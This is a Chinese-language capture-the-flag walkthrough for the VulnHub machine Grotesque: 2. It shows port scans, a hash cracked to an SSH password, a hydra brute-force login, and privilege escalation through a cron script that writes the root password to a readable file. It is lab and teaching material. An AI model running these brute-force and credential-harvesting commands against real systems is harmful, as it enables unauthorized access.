靶机描述
靶机地址:https://www.vulnhub.com/entry/grotesque-2,673/
Description
get flags
difficulty: medium
about vm: do not touch ram allocation. vm needs 4gb of ram. tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.
This works better with VirtualBox rather than VMware
一、搭建靶机环境
攻击机Kali:
IP地址:192.168.9.3
靶机:
IP地址:192.168.9.10
靶机环境建设如下
- 将下载的靶机环境导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥模式网卡设置 VritualBox 的 Host-only
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫描)
arp-scan -I eth0 -l
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth0 -r 192.168.184.0/24
方法四,等你补充
2.1.2 检查靶机开口端口
使用nmap -A -sV -T4 -p- 靶机ip检查靶机开口端口
上面那个适合开少量端口以获得一些详细信息
运行nmap -A -sV -T4 -p- -oN namp.txt 192.168.9.10先让他边跑边跑
因为靶机开发的端口太多了
咱们直接用nmap -sT 192.168.9.10 先扫一遍
? Grotesque: 2 nmap -sT 192.168.9.10 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-02 17:50 CST Nmap scan report for bogon (192.168.9.10) Host is up (0.0013s latency). Not shown: 921 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 32/tcp open unknown 33/tcp open dsp 37/tcp open time 42/tcp open nameserver 43/tcp open whois 49/tcp open tacacs 53/tcp open domain 70/tcp open gopher 79/tcp open finger 80/tcp open http 81/tcp open hosts2-ns 82/tcp open xfer 83/tcp open mit-ml-dev 84/tcp open ctf 85/tcp open mit-ml-dev 88/tcp open kerberos-sec 89/tcp open su-mit-tg 90/tcp open dnsix 99/tcp open metagram 100/tcp open newacct
106/tcp open pop3pw
109/tcp open pop2
110/tcp open pop3
111/tcp open rpcbind
113/tcp open ident
119/tcp open nntp
125/tcp open locus-map
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
144/tcp open news
146/tcp open iso-tp0
161/tcp open snmp
163/tcp open cmip-man
179/tcp open bgp
199/tcp open smux
211/tcp open 914c-g
212/tcp open anet
222/tcp open rsh-spx
254/tcp open unknown
255/tcp open unknown
256/tcp open fw1-secureremote
259/tcp open esro-gen
264/tcp open bgmp
280/tcp open http-mgmt
301/tcp open unknown
306/tcp open unknown
311/tcp open asip-webadmin
340/tcp open unknown
366/tcp open odmr
389/tcp open ldap
406/tcp open imsp
407/tcp open timbuktu
416/tcp open silverplatter
417/tcp open onmux
425/tcp open icad-el
427/tcp open svrloc
443/tcp open https
444/tcp open snpp
445/tcp open microsoft-ds
458/tcp open appleqtc
464/tcp open kpasswd5
465/tcp open smtps
481/tcp open dvs
497/tcp open retrospect
500/tcp open isakmp
512/tcp open exec
513/tcp open login
514/tcp open shell
515/tcp open printer
524/tcp open ncp
541/tcp open uucp-rlogin
543/tcp open klogin
544/tcp open kshell
545/tcp open ekshell
548/tcp open afp
554/tcp open rtsp
555/tcp open dsf
MAC Address: 08:00:27:E7:87:C3 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.49
开放了太多端口了,每个端口还对应了相应的服务
等了一会儿结果出来了
# Nmap 7.92 scan initiated Mon May 2 17:45:06 2022 as: nmap -A -sV -T4 -p- -oN namp.txt 192.168.9.10
Nmap scan report for bogon (192.168.9.10)
Host is up (0.00062s latency).
Not shown: 65009 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
31/tcp open http PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8). 32/tcp open http PHP cli server 5.5 or later |_auth-owners: ERROR: Script execution failed (use -d to debug) |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
.
.
.一样的省略了
.
.
80/tcp open http PHP cli server 5.5 or later
|_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_auth-owners: ERROR: Script execution failed (use -d to debug) 81/tcp open http PHP cli server 5.5 or later |_auth-owners: ERROR: Script execution failed (use -d to debug) |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
.
.
.一样的省略了
.
.
555/tcp open http PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:E7:87:C3 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms bogon (192.168.9.10)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 2 17:56:12 2022 -- 1 IP address (1 host up) scanned in 665.77 seconds
可以发现一大堆都是http
2.2枚举漏洞
2.2.1 80 端口分析
由于开放端口太多,咱们照旧先访问80:http://192.168.9.10/
源码也没东西,扫描一下目录
⬢ Grotesque: 2 gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.9.10 -x php,html,txt,zip,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.10
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,txt,zip,bak,php
[+] Timeout: 10s
===============================================================
2022/05/02 17:54:55 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.9.10/74c31a13-d670-419d-ab99-a39422881851 => 200 (Length: 412). To continue please exclude the status code, the length or use the --wildcard switch
⬢ Grotesque: 2
很明显,突破口不是这里
2.2.2 全端口分析
根据nmap的扫描结果,可以发现后边的端口都是http
随便拿几个访问,发现页面都是一样的
我决定用wget去把这些页面下载下来看一下文件是否有区别
for i in {23..600};do wget 192.168.9.10:$i -O index$i;done
成功下载来直接运行ls -al | sort进行排序
发现除了258是762字节,其他页面均是412字节
2.2.3 258端口分析
访问:http://192.168.9.10:258/
看到有ssh的几个用户名
atan、raphael、angel、distress、greed、lust
基本可以确定要进行ssh密码暴力破解 但是字典怎么生成呢
然后看到第二行的图片是可以打开的
这个颜色有点不一样,放大看到这里有一串hash值
就这么看,看的很模糊
这就清楚很多了:b6e705ea1249e2bb7b01d7dac91cd0b3
使用 CrackStation 来破解它
得到密码值为solomon1
创建字典users.txt
atan
raphael
angel
distress
greed
lust
使用hydra进行爆破:hydra -L users.txt -p solomon1 ssh://192.168.9.10 -f
⬢ Grotesque: 2 hydra -L users.txt -p solomon1 ssh://192.168.9.10 -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-05-02 18:51:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://192.168.9.10:22/
[22][ssh] host: 192.168.9.10 login: angel password: solomon1
[STATUS] attack finished for 192.168.9.10 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-05-02 18:51:25
成功爆破出用户密码angel ,solomon1
尝试登录
⬢ Grotesque: 2 ssh angel@192.168.9.10
The authenticity of host '192.168.9.10 (192.168.9.10)' can't be established. ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.9.10' (ED25519) to the list of known hosts. angel@192.168.9.10's password:
Linux grotesque 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
angel@grotesque:~$
2.3漏洞利用
无
2.4权限提升
2.4.1 信息收集
查看当前目录下有什么东西
angel@grotesque:~$ ls -al
total 52
drwxr-xr-x 4 angel angel 4096 Mar 27 2021 .
drwxr-xr-x 3 root root 4096 Mar 27 2021 ..
drwxr-xr-x 2 angel angel 36864 Mar 27 2021 quiet
drwx------ 2 angel angel 4096 Mar 27 2021 .ssh
-r-x------ 1 angel angel 1805 Jan 3 2021 user.txt
angel@grotesque:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
angel@grotesque:~$
成功拿到flag1,同时发现有新目录quiet
查看quiet目录下有什么
不知道是啥东西
上传一个pspy64看一下有什么计划任务
这里我用Filezilla,当然这里也可以用wget啥的
赋予权限,然后运行一下
chmod 777 pspy64
./pspy64
显示脚本write.sh和check.sh在一些固定时间间隔后运行
这里咱们目前没有权限去查看内容
angel@grotesque:/tmp$ cat /root/check.sh
cat: /root/check.sh: Permission denied
angel@grotesque:/tmp$ cat /root/write.sh
cat: /root/write.sh: Permission denied
angel@grotesque:/tmp$
上边咱们发现/home/angel/quiet文件夹中有一些莫名其妙的东西,是不是就是这个脚本写的
尝试删除中的所有文件,看看会发生什么
两个脚本运行后,它会在 quiet 文件夹中再次创建文件,但都是相同的
恩,,,再上传一个linpeas.sh看看吧
它在最近 5 分钟内在/根目录下修改的文件rootcreds.txt
查看其内容
angel@grotesque:/tmp$ cd /
angel@grotesque:/$ ls
bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root rootcreds.txt run sbin srv sys tmp usr var vmlinuz vmlinuz.old
angel@grotesque:/$ cat root
root/ rootcreds.txt
angel@grotesque:/$ cat rootcreds.txt
root creds
root
sweetchild
root creds
root
sweetchild
angel@grotesque:
这个应该就是密码了
尝试切换root
angel@grotesque:/$ su root
Password:
root@grotesque:/# cd /root
root@grotesque:~# ls
check.sh logdel2 real real.sh root.txt test upit2.sh upit.sh write.sh
root@grotesque:~# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
root@grotesque:~#
成功拿到flag2
回头看看check.sh以及write.sh
root@grotesque:~# cat check.sh
#!/bin/bash
cd /home/angel/quiet
if [[ $(ls) == "" ]]; then
echo "root creds" >> /rootcreds.txt
echo "" >> /rootcreds.txt
echo "root" >> /rootcreds.txt
echo "sweetchild" >> /rootcreds.txt
chmod 777 /rootcreds.txt
fi
root@grotesque:~# cat write.sh
#!/bin/bash
cd /home/angel/quiet
for i in {
1..2323}; do echo "quiet" >> $i; done
root@grotesque:~#
check.sh 运行时,在/home/angel/quiet 中执行ls 命令,如果没有文件,则将root creds 写入/目录下名为rootcreds.txt 的文件中,并赋予其读、写和执行权限。
write.sh 创建从 1 到 2323 的文件,并在所有这些文件中写入quiet
总结
又是一个挺有意思的靶机
- 信息收集
- hydra爆破ssh